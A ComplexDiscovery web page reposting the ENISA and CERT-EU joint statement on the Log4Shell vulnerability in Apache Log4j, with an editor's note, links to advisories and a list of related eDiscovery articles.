Fri. Jan 28th, 2022
    en flag
    nl flag
    et flag
    fi flag
    fr flag
    de flag
    he flag
    ja flag
    lv flag
    pl flag
    pt flag
    ru flag
    es flag

    Content Assessment: Assessment and Advice - ENISA Update on Log4j Vulnerability

    Information - 89%
    Insight - 88%
    Relevance - 92%
    Objectivity - 91%
    Authority - 95%

    91%

    Excellent

    A short percentage-based assessment of the qualitative benefit of the recently published ENISA update the Log4j vulnerability.

    Editor’s Note: On December 9th, information about a critical unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2021-44228) that is affecting the well-known Java logging package Log4j used by many popular applications and web services was tweeted along with a proof-of-concept (PoC) posted on GitHub. This vulnerability could allow the attacker full control of the affected server if a user-controlled string is logged. Since it is easy to be exploited, the impact of this vulnerability is quite severe. This ENISA overview and updated CERT-EU security advisory may be beneficial for cybersecurity, information governance, and legal discovery professionals in the eDiscovery ecosystem facing the challenge of this vulnerability.


    Media Announcement from ENISA and Report from CERT-EU*

    Joint Statement on Log4Shell

    The European Commission, the EU Agency for Cybersecurity, CERT-EU, and the network of the EU national computer security incident response teams (CSIRTs network) have been closely following the development of the Log4Shell vulnerability since 10 December 2021.

    Log4Shell is a vulnerability in the well-known open-source Java logging package Log4j, which is maintained by the Apache Software Foundation. Log4j is used in a wide array of applications and web services across the globe. Due to the nature of the vulnerability, its ubiquity, and the complexity of patching in some of the impacted environments, it is important that all organizations, especially entities who fall under the Network and Information Security (NIS) Directive, assess their potential exposure as soon as possible.

    The CSIRTs Network members are continuously updating a list of vulnerable software, which is maintained by the Dutch National Cyber Security Centre. It is important that adequate mitigation measures are applied in a timely manner and that organizations follow the guidance of their national cybersecurity authorities. The latest advisories published by the CSIRTs Network Members can be found in their relevant official communication channels. Organizations may also refer to guidance given by CERT-EU.

    As this is a developing situation, we strongly recommend all organizations to regularly check the guidance provided by the CSIRTs Network Members and CERT-EU for the latest assessment and advice and to take actions as needed

    The Agency and all relevant EU actors will continue to monitor this threat to contribute to the overall situational awareness at the Union level.

    For technical background information about the vulnerability and recommendations: Security Advisory 2021-067 – CERT-EU

    For guidance on response please refer to the relevant national authority: CSIRTs by Country – Interactive Map — ENISA

    The latest advisories published by CSIRTs Network Members are available here: https://github.com/enisaeu/CNW/blob/main/advisories.md

    Read the original update.


    Read the Complete Security Advisory: Java Logging Package RCE Vulnerability (PDF) – Mouseover to Scroll

    CERT-EU-SA2021-067

    See the original security alert.

    *Shared with permission under Creative Commons – Attribution 4.0 International (CC BY 4.0) – license.

    Additional Reading

    Source: ComplexDiscovery

     

    Have a Request?

    If you have information or offering requests that you would like to ask us about, please let us know and we will make our response to you a priority.

    ComplexDiscovery is an online publication that highlights cyber, data, and legal discovery insight and intelligence ranging from original research to aggregated news for use by cybersecurity, information governance, and eDiscovery professionals. The highly targeted publication seeks to increase the collective understanding of readers regarding cyber, data, and legal discovery information and issues and to provide an objective resource for considering trends, technologies, and services related to electronically stored information.

    ComplexDiscovery OÜ is a technology marketing firm providing strategic planning and tactical execution expertise in support of cyber, data, and legal discovery organizations. Focused primarily on supporting the ComplexDiscovery publication, the company is registered as a private limited company in the European Union country of Estonia, one of the most digitally advanced countries in the world. The company operates virtually worldwide to deliver marketing consulting and services.

    Time to Assess? NIST Updates Security Control Assessment Procedures

    Security and privacy control assessments are not about checklists, simple pass/fail...

    [2021/2022 Annual Update] International Cyber Law in Practice: Interactive Toolkit

    New scenarios ranging from cyber operations against medical facilities to a...

    A Comprehensive Cyber Discovery Resource? The DoD Cybersecurity Policy Chart from CSIAC

    The Cyber Security and Information Systems Information Analysis Center (CSIAC) is...

    Business Interrupted? The 11th Edition of the Annual Allianz Risk Barometer

    According to the new report, following a year of unprecedented cyber-attacks,...

    A Nuix Update: First Half 2022 Financial Results

    Since the Trading Update at the Annual General Meeting (AGM) covering...

    Mitratech Acquires Quovant

    According to Mike Williams, CEO of Mitratech, “We are thrilled to...

    eDiscovery Mergers, Acquisitions, and Investments in 2021

    Since beginning to track the number of publicly highlighted merger, acquisition,...

    eDiscovery Mergers, Acquisitions, and Investments in Q4 2021

    From Consilio and Epiq to Driven and Innovative Discovery, the following...

    Trusting the Process? 2021 eDiscovery Processing Task, Spend, and Cost Data Points

    Based on the complexity of cybersecurity, information governance, and legal discovery,...

    The Year in Review? 2021 eDiscovery Review Task, Spend, and Cost Data Points

    Based on the complexity of cybersecurity, information governance, and legal discovery,...

    A 2021 Look at eDiscovery Collection: Task, Spend, and Cost Data Points

    Based on the complexity of cybersecurity, information governance, and legal discovery,...

    An eDiscovery Market Size Mashup: 2021-2026 Worldwide Software and Services Overview

    From market retraction in 2020 to resurgence in 2021, the worldwide...

    Five Great Reads on Cyber, Data, and Legal Discovery for January 2022

    From artificial intelligence and machine learning to business confidence and cybersecurity...

    Five Great Reads on Cyber, Data, and Legal Discovery for December 2021

    From CISA cybersecurity guidance to mastering megamatters, the December 2021 edition...

    Five Great Reads on Cyber, Data, and Legal Discovery for November 2021

    From worldwide eDiscovery market sizing and discovery intelligence to cybersecurity playbooks...

    Five Great Reads on Cyber, Data, and Legal Discovery for October 2021

    From artificial intelligence and predictive coding to eDiscovery business confidence and...

    A Talent Trap? Issues Impacting eDiscovery Business Performance: A Winter 2022 Overview

    In the winter of 2022, 35.2% of respondents viewed lack of...

    Transfers in Order? eDiscovery Operational Metrics in the Winter of 2022

    In the winter of 2021, 43 eDiscovery Business Confidence Survey participants...

    A View from the Top? Winter 2022 eDiscovery Business Confidence Survey Results

    Since January 2016, 2,649 individual responses to twenty-five quarterly eDiscovery Business...

    Common Cents? An Aggregate Overview of Seven Semi-Annual eDiscovery Pricing Surveys

    The anonymized aggregate results from seven semi-annual surveys highlight eDiscovery pricing...